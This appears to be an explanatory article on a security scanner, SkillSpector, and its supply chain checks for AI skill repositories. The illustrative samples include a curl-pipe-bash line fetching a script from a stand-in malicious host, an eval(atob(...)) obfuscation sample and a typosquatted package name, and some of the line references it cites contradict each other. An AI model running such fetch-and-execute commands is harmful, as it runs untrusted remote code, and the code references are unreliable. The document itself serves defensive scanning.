# What Supply Chain Vulnerabilities Does SkillSpector Detect? Complete Guide to SC1-SC6 and TR1-TR3

> SkillSpector finds nine supply chain vulnerabilities including unpinned dependencies, typosquatting, obfuscated code & CVEs. Learn about SC1-SC6 and TR1-TR3.

- Repository: [NVIDIA Corporation/SkillSpector](https://github.com/NVIDIA/SkillSpector)
- Tags: deep-dive
- Published: 2026-07-12

---

**SkillSpector detects nine distinct classes of supply chain vulnerabilities, ranging from unpinned dependencies and typosquatting to obfuscated code and known CVEs, using a hybrid approach of static regex patterns, live OSV.dev queries, and hard-coded fallback tables.**

NVIDIA's SkillSpector is an open-source security analyzer that inspects AI skill repositories for supply chain vulnerabilities before deployment. The tool implements a dedicated **Supply Chain Analyzer** in [`src/skillspector/nodes/analyzers/static_patterns_supply_chain.py`](https://github.com/NVIDIA/SkillSpector/blob/main/src/skillspector/nodes/analyzers/static_patterns_supply_chain.py) that surfaces six core dependency risks (SC1–SC6) and three trigger-abuse patterns (TR1–TR3). By combining static analysis with real-time vulnerability database queries, SkillSpector identifies security flaws in dependency manifests, installation scripts, and skill definitions.

## Dependency Manifest Vulnerabilities

The analyzer inspects [`requirements.txt`](https://github.com/NVIDIA/SkillSpector/blob/main/requirements.txt), [`package.json`](https://github.com/NVIDIA/SkillSpector/blob/main/package.json), [`pyproject.toml`](https://github.com/NVIDIA/SkillSpector/blob/main/pyproject.toml), and other manifest files to detect four specific categories of dependency risks.

### SC1: Unpinned and Poorly Specified Dependencies

Unpinned dependencies allow unexpected package updates that may introduce breaking changes or malicious code. SkillSpector flags any declaration that lacks an exact version pin, including open-ended ranges like `package >= 1.2` or wildcard specifications like `package == *`.

In [`static_patterns_supply_chain.py`](https://github.com/NVIDIA/SkillSpector/blob/main/static_patterns_supply_chain.py), the `SC1_PATTERNS` regex list (lines 52–63) matches these patterns across dependency manifests:

```python

# requirements.txt

flask
numpy>=1.18
pandas == *

```

When detected, the analyzer generates a **LOW** severity finding with confidence 0.6, identifying the specific line and package name that lacks version constraints.

### SC4: Known Vulnerable Dependencies

SkillSpector queries the **OSV.dev** database to identify packages with published CVEs. The implementation uses `query_batch` in [`osv_client.py`](https://github.com/NVIDIA/SkillSpector/blob/main/osv_client.py) (lines 61–66) to perform live lookups for every extracted dependency. If the service is unreachable or returns no results, the analyzer falls back to static tables `_FALLBACK_VULNERABLE_PYPI` and `_FALLBACK_VULNERABLE_NPM` (lines 106–134 in [`static_patterns_supply_chain.py`](https://github.com/NVIDIA/SkillSpector/blob/main/static_patterns_supply_chain.py)).

For a vulnerable `urllib3` declaration:

```toml
[project]
dependencies = ["urllib3<2.0"]

```

The tool reports: `Known Vulnerable Dependency: urllib3==1.26.5 — CVE-2021-33503 (ReDoS)` with **CRITICAL** or **HIGH** severity based on OSV severity ratings.

### SC5: Abandoned and Unmaintained Packages

Dependencies that no longer receive security updates pose long-term risks. The analyzer maintains a hard-coded set `_ABANDONED_PACKAGES` (lines 140–182) containing unmaintained packages like `pycrypto` and `request`.

When scanning detects these packages, it generates a **MEDIUM** severity finding noting that the package is unmaintained and unlikely to receive future security patches.

### SC6: Typosquatting Detection

Malicious actors often publish packages with names similar to popular libraries (e.g., `reqeusts` instead of `requests`). SkillSpector detects these using the `_is_typosquat` function (lines 91–114), which calculates Levenshtein distance via `_edit_distance` (lines 75–88) against lists of popular packages (`_POPULAR_PYPI` and `_POPULAR_NPM`, lines 188–238).

For a typosquatted dependency:

```txt
reqeusts==2.25.1

```

The analyzer reports: `Possible Typosquatting: 'reqeusts' resembles popular package 'requests'` with **HIGH** severity and 0.7 confidence.

## Code Execution and Integrity Risks

Beyond dependency manifests, SkillSpector analyzes source files for patterns indicating immediate code execution or obfuscation.

### SC2: External Script Fetching

The tool detects dangerous curl-pipe-bash patterns and similar constructs that download and immediately execute remote scripts. The `SC2_PATTERNS` regex list (lines 65–78) matches commands like `curl … | bash` and `wget … | sudo bash`.

A helper function `_is_safe_supply_chain_pattern` checks for trusted domains before raising confidence. For untrusted domains:

```bash
curl https://malicious.com/install.sh | bash

```

SkillSpector generates a **HIGH** severity finding with 0.9 confidence, flagging the external script execution risk.

### SC3: Obfuscated Code

Malicious payloads often hide behind base64 encoding, hex strings, or dynamic evaluation. The `SC3_PATTERNS` list (lines 80–97) captures obfuscation primitives including `eval`, `atob`, `new Function`, `marshal`, and hex-encoded strings.

For JavaScript code like:

```js
eval(atob("ZnVuY3Rpb24gYWJjKCl7IHJldHVybiAiSGVsbG8iOyB9"));

```

The analyzer reports **HIGH** severity obfuscated code with 0.95 confidence, highlighting the specific deobfuscation technique detected.

## Trigger Abuse Patterns

SkillSpector analyzes [`SKILL.md`](https://github.com/NVIDIA/SkillSpector/blob/main/SKILL.md) manifest files for trigger definitions that could lead to unintended activation or command shadowing.

### TR1: Overly Broad Triggers

Single-word triggers like "help" or "the" activate in unintended contexts. The analyzer checks against `_OVERLY_BROAD_SINGLE_WORDS` (lines 75–98) and applies length thresholds in `_analyze_triggers`. These generate **LOW** severity findings.

### TR2: Shadow Commands

When a trigger name matches built-in system commands (e.g., "install", "run"), it shadows the native functionality. The analyzer consults `_BUILTIN_COMMANDS` (lines 21–73) during trigger analysis and reports **MEDIUM** severity conflicts.

### TR3: Keyword Baiting

Generic bait phrases designed to match almost any user input are flagged by regex patterns in `baiting_patterns` (lines 124–130). These **MEDIUM** severity findings identify triggers like "anything" that attempt to capture all user interactions.

## Implementation Architecture

The analysis orchestrates through the `node()` function (lines 545–583) in [`static_patterns_supply_chain.py`](https://github.com/NVIDIA/SkillSpector/blob/main/static_patterns_supply_chain.py), which coordinates three distinct analysis phases:

1. **Static Pattern Matching**: SC1–SC3 patterns execute via `static_runner.run_static_patterns` against all source files
2. **Dependency Analysis**: `_analyze_dependencies` (lines 558–748) extracts package names from manifests, queries OSV.dev via `_sc4_from_osv` (lines 661–708), checks abandoned packages, and runs typosquatting detection
3. **Trigger Analysis**: `_analyze_triggers` (lines 554–645) validates trigger definitions against built-in commands and baiting patterns

All findings convert to the SARIF-compatible `Finding` model defined in [`src/skillspector/models.py`](https://github.com/NVIDIA/SkillSpector/blob/main/src/skillspector/models.py) and route through the analysis pipeline.

## Summary

SkillSpector's supply chain analyzer provides comprehensive coverage of dependency and execution risks through:

- **Static regex patterns** for unpinned dependencies, external scripts, and obfuscated code
- **Live OSV.dev integration** with static fallback tables for known CVEs
- **Hard-coded knowledge bases** for abandoned packages, popular package names, and typosquatting detection
- **Trigger validation** against built-in commands and overly broad patterns
- **Severity scoring** ranging from LOW (unpinned deps) to CRITICAL (known CVEs) based on exploitability and impact

## Frequently Asked Questions

### What file types does SkillSpector analyze for supply chain vulnerabilities?

SkillSpector analyzes standard dependency manifests including [`requirements.txt`](https://github.com/NVIDIA/SkillSpector/blob/main/requirements.txt), [`pyproject.toml`](https://github.com/NVIDIA/SkillSpector/blob/main/pyproject.toml), [`package.json`](https://github.com/NVIDIA/SkillSpector/blob/main/package.json), [`Cargo.toml`](https://github.com/NVIDIA/SkillSpector/blob/main/Cargo.toml), and similar configuration files. The tool also inspects shell scripts and source code files for external script fetching (SC2) and obfuscation (SC3) patterns, plus [`SKILL.md`](https://github.com/NVIDIA/SkillSpector/blob/main/SKILL.md) files for trigger abuse (TR1–TR3).

### How does SkillSpector handle offline environments without OSV.dev access?

When the OSV.dev service is unreachable, SkillSpector falls back to static vulnerability tables `_FALLBACK_VULNERABLE_PYPI` and `_FALLBACK_VULNERABLE_NPM` embedded in [`static_patterns_supply_chain.py`](https://github.com/NVIDIA/SkillSpector/blob/main/static_patterns_supply_chain.py) (lines 106–134). This ensures that known vulnerable dependencies still receive CRITICAL or HIGH severity findings even without network connectivity, though the live database provides more comprehensive coverage.

### Can SkillSpector detect typosquatting in private package repositories?

The current implementation focuses on public package ecosystems (PyPI and npm) using hard-coded popular package lists (`_POPULAR_PYPI` and `_POPULAR_NPM`). While the Levenshtein distance algorithm in `_is_typosquat` (lines 91–114) could theoretically apply to private registries, the built-in popularity lists specifically target public packages known to be frequently typosquatted.

### What is the difference between SC2 and SC3 severity levels?

SC2 (External Script Fetching) and SC3 (Obfuscated Code) both generate **HIGH** severity findings, but for different risk profiles. SC2 identifies immediate remote code execution via pipe-to-shell commands, while SC3 flags hidden payloads that may execute malicious logic through deobfuscation. SC2 confidence varies based on domain trust checks via `_is_safe_supply_chain_pattern`, whereas SC3 maintains consistently high confidence (0.95) due to clear obfuscation indicators.